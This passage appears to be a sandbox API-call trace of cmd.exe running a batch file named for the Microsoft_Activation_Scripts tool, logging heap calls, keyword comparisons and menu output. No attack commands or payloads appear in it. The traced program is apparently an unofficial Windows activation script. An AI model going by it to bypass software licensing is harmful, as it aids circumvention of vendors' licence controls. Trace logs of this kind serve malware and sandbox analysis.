"c:\\windows\\system32\\\n")) returned 0xffffffff [0181.053] GetLastError () returned 0x7b [0181.053] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.053] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0181.053] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0181.054] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0181.054] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0181.054] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0181.054] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0181.054] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0181.054] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0181.054] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0181.054] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.054] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.054] GetProcessHeap () returned 0x19a8f1e0000 [0181.054] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa6) returned 0x19a8f200be0 [0181.054] GetProcessHeap () returned 0x19a8f1e0000 [0181.054] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12c) returned 0x19a8f1ea8b0 [0181.054] GetProcessHeap () returned 0x19a8f1e0000 [0181.054] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x94) returned 0x19a8f1ea8b0 [0181.054] GetProcessHeap () returned 0x19a8f1e0000 [0181.054] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x94 [0181.054] GetProcessHeap () returned 0x19a8f1e0000 [0181.054] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa8) returned 0x19a8f1ffed0 [0181.054] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" ______________________________________________________________\r\n") returned 71 [0181.054] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.054] GetFileType (hFile=0x24) returned 0x2 [0181.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.055] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0181.055] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.055] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x47) returned 1 [0181.060] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.060] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.060] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.060] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.061] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.061] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.061] SetConsoleInputExeNameW () returned 0x1 [0181.061] GetConsoleOutputCP () returned 0x1b5 [0181.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.062] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.062] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0181.062] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.062] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9977, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x26f9 [0181.062] GetProcessHeap () returned 0x19a8f1e0000 [0181.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ffed0) returned 1 [0181.063] GetProcessHeap () returned 0x19a8f1e0000 [0181.063] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0181.063] GetProcessHeap () returned 0x19a8f1e0000 [0181.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200be0) returned 1 [0181.064] GetProcessHeap () returned 0x19a8f1e0000 [0181.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2003a0) returned 1 [0181.064] GetProcessHeap () returned 0x19a8f1e0000 [0181.064] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0181.064] GetProcessHeap () returned 0x19a8f1e0000 [0181.065] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0181.070] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.070] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x26f9 [0181.070] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.070] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2700 [0181.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 7 [0181.070] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.070] GetFileType (hFile=0xa0) returned 0x1 [0181.071] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.071] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2700 [0181.071] GetProcessHeap () returned 0x19a8f1e0000 [0181.071] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.071] GetProcessHeap () returned 0x19a8f1e0000 [0181.071] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.072] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0181.073] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0181.073] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0181.073] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0181.073] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0181.073] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0181.073] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0181.073] GetProcessHeap () returned 0x19a8f1e0000 [0181.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0181.073] GetProcessHeap () returned 0x19a8f1e0000 [0181.073] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0181.073] _tell (_FileHandle=3) returned 9984 [0181.074] _close (_FileHandle=3) returned 0 [0181.074] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0181.074] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0181.074] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0181.074] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0181.074] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0181.074] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0181.074] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0181.075] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0181.075] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0181.075] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0181.075] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0181.075] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0181.075] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0181.075] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0181.075] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0181.075] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0181.075] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0181.075] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0181.075] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0181.075] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0181.076] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0181.076] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0181.076] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0181.076] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0181.076] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0181.076] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0181.076] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0181.076] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0181.076] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0181.076] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0181.076] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0181.076] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0181.077] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0181.077] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0181.077] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0181.077] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0181.077] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0181.077] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0181.077] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0181.077] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0181.077] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0181.077] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0181.077] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0181.078] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0181.078] GetLastError () returned 0x7b [0181.078] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.079] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0181.079] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0181.079] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0181.079] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0181.079] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0181.079] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0181.079] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0181.079] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0181.079] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0181.080] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.080] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.080] GetProcessHeap () returned 0x19a8f1e0000 [0181.080] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0181.080] GetProcessHeap () returned 0x19a8f1e0000 [0181.080] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec960 [0181.080] GetProcessHeap () returned 0x19a8f1e0000 [0181.080] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec960, Size=0x16) returned 0x19a8f1ec680 [0181.080] GetProcessHeap () returned 0x19a8f1e0000 [0181.080] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ec680) returned 0x16 [0181.080] GetProcessHeap () returned 0x19a8f1e0000 [0181.080] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb8f0 [0181.080] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer="\r\n") returned 2 [0181.080] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.080] GetFileType (hFile=0x24) returned 0x2 [0181.080] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.080] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0181.080] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.080] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x2) returned 1 [0181.081] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.081] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.081] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.081] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.081] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.082] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.082] SetConsoleInputExeNameW () returned 0x1 [0181.082] GetConsoleOutputCP () returned 0x1b5 [0181.082] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.082] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.082] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0181.083] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0181.083] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.083] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2700 [0181.083] GetProcessHeap () returned 0x19a8f1e0000 [0181.083] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0181.083] GetProcessHeap () returned 0x19a8f1e0000 [0181.083] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec680) returned 1 [0181.083] GetProcessHeap () returned 0x19a8f1e0000 [0181.083] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.083] GetProcessHeap () returned 0x19a8f1e0000 [0181.083] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.083] GetProcessHeap () returned 0x19a8f1e0000 [0181.083] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0181.084] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.084] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2700 [0181.084] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0181.084] SetFilePointer (in: hFile=0xa0, lDistanceToMove=10090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.084] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n", cbMultiByte=106, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 106 [0181.084] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.084] GetFileType (hFile=0xa0) returned 0x1 [0181.084] _get_osfhandle (_FileHandle=3) returned 0xa0 [0181.084] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x276a [0181.084] GetProcessHeap () returned 0x19a8f1e0000 [0181.084] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.085] GetProcessHeap () returned 0x19a8f1e0000 [0181.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.085] GetProcessHeap () returned 0x19a8f1e0000 [0181.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb8f0 [0181.085] GetEnvironmentVariableW (in: lpName="_White", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x8 [0181.085] GetProcessHeap () returned 0x19a8f1e0000 [0181.085] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0181.085] GetProcessHeap () returned 0x19a8f1e0000 [0181.085] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.086] GetProcessHeap () returned 0x19a8f1e0000 [0181.086] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f2119d0 [0181.086] GetProcessHeap () returned 0x19a8f1e0000 [0181.086] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1eb950 [0181.086] GetEnvironmentVariableW (in: lpName="_Green", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x8 [0181.086] GetProcessHeap () returned 0x19a8f1e0000 [0181.086] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0181.086] GetProcessHeap () returned 0x19a8f1e0000 [0181.086] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2119d0) returned 1 [0181.086] GetProcessHeap () returned 0x19a8f1e0000 [0181.087] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.087] _wcsicmp (_String1="call", _String2=")") returned 58 [0181.088] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0181.088] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0181.088] _wcsicmp (_String1="IF", _String2="call") returned 6 [0181.088] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0181.088] _wcsicmp (_String1="REM", _String2="call") returned 15 [0181.088] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0181.088] GetProcessHeap () returned 0x19a8f1e0000 [0181.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0181.088] GetProcessHeap () returned 0x19a8f1e0000 [0181.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0181.088] GetProcessHeap () returned 0x19a8f1e0000 [0181.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xda) returned 0x19a8f1fc7a0 [0181.088] _tell (_FileHandle=3) returned 10090 [0181.088] _close (_FileHandle=3) returned 0 [0181.088] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0181.088] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0181.088] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0181.088] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0181.088] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0181.088] _wcsicmp (_String1="call", _String2="CD") returned -3 [0181.088] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0181.088] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0181.088] _wcsicmp (_String1="call", _String2="REN") returned -15 [0181.088] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0181.089] _wcsicmp (_String1="call", _String2="SET") returned -16 [0181.089] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0181.089] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0181.089] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0181.089] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0181.089] _wcsicmp (_String1="call", _String2="MD") returned -10 [0181.089] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0181.089] _wcsicmp (_String1="call", _String2="RD") returned -15 [0181.089] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0181.089] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0181.089] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0181.089] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0181.089] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0181.089] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0181.089] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.090] _wcsicmp (_String1="call", _String2="DIR") returned -1 [0181.090] _wcsicmp (_String1="call", _String2="ERASE") returned -2 [0181.090] _wcsicmp (_String1="call", _String2="DEL") returned -1 [0181.090] _wcsicmp (_String1="call", _String2="TYPE") returned -17 [0181.090] _wcsicmp (_String1="call", _String2="COPY") returned -14 [0181.091] _wcsicmp (_String1="call", _String2="CD") returned -3 [0181.091] _wcsicmp (_String1="call", _String2="CHDIR") returned -7 [0181.091] _wcsicmp (_String1="call", _String2="RENAME") returned -15 [0181.091] _wcsicmp (_String1="call", _String2="REN") returned -15 [0181.091] _wcsicmp (_String1="call", _String2="ECHO") returned -2 [0181.091] _wcsicmp (_String1="call", _String2="SET") returned -16 [0181.091] _wcsicmp (_String1="call", _String2="PAUSE") returned -13 [0181.091] _wcsicmp (_String1="call", _String2="DATE") returned -1 [0181.091] _wcsicmp (_String1="call", _String2="TIME") returned -17 [0181.091] _wcsicmp (_String1="call", _String2="PROMPT") returned -13 [0181.091] _wcsicmp (_String1="call", _String2="MD") returned -10 [0181.091] _wcsicmp (_String1="call", _String2="MKDIR") returned -10 [0181.091] _wcsicmp (_String1="call", _String2="RD") returned -15 [0181.091] _wcsicmp (_String1="call", _String2="RMDIR") returned -15 [0181.091] _wcsicmp (_String1="call", _String2="PATH") returned -13 [0181.091] _wcsicmp (_String1="call", _String2="GOTO") returned -4 [0181.091] _wcsicmp (_String1="call", _String2="SHIFT") returned -16 [0181.091] _wcsicmp (_String1="call", _String2="CLS") returned -11 [0181.091] _wcsicmp (_String1="call", _String2="CALL") returned 0 [0181.091] GetProcessHeap () returned 0x19a8f1e0000 [0181.091] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a4) returned 0x19a8f1eabb0 [0181.091] GetProcessHeap () returned 0x19a8f1e0000 [0181.091] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xda) returned 0x19a8f1eabb0 [0181.091] GetProcessHeap () returned 0x19a8f1e0000 [0181.091] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xda [0181.091] GetProcessHeap () returned 0x19a8f1e0000 [0181.091] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xe4) returned 0x19a8f1fc200 [0181.091] GetProcessHeap () returned 0x19a8f1e0000 [0181.091] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20caf0 [0181.092] GetProcessHeap () returned 0x19a8f1e0000 [0181.092] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.092] GetProcessHeap () returned 0x19a8f1e0000 [0181.093] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.093] _wcsicmp (_String1=":_color2", _String2=")") returned 17 [0181.093] _wcsicmp (_String1="FOR", _String2=":_color2") returned 44 [0181.093] _wcsicmp (_String1="FOR/?", _String2=":_color2") returned 44 [0181.093] _wcsicmp (_String1="IF", _String2=":_color2") returned 47 [0181.093] _wcsicmp (_String1="IF/?", _String2=":_color2") returned 47 [0181.093] _wcsicmp (_String1="REM", _String2=":_color2") returned 56 [0181.093] _wcsicmp (_String1="REM/?", _String2=":_color2") returned 56 [0181.093] GetProcessHeap () returned 0x19a8f1e0000 [0181.093] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0181.093] GetProcessHeap () returned 0x19a8f1e0000 [0181.093] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb920 [0181.093] GetProcessHeap () returned 0x19a8f1e0000 [0181.093] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.093] GetProcessHeap () returned 0x19a8f1e0000 [0181.094] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.094] GetProcessHeap () returned 0x19a8f1e0000 [0181.094] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc8) returned 0x19a8f1e5550 [0181.094] GetProcessHeap () returned 0x19a8f1e0000 [0181.094] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e8) returned 0x19a8f1f9f80 [0181.094] SaferWorker () returned 0x0 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb740 [0181.177] wcsspn (_String=" \"40;37m\" \" \" \"40;92m\" \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"", _Control=" \x09") returned 0x1 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xc6) returned 0x19a8f1eaed0 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x17c) returned 0x19a8f1e5e10 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0xc8) returned 0x19a8f1e5e10 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0xc8 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 [0181.177] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0181.177] GetProcessHeap () returned 0x19a8f1e0000 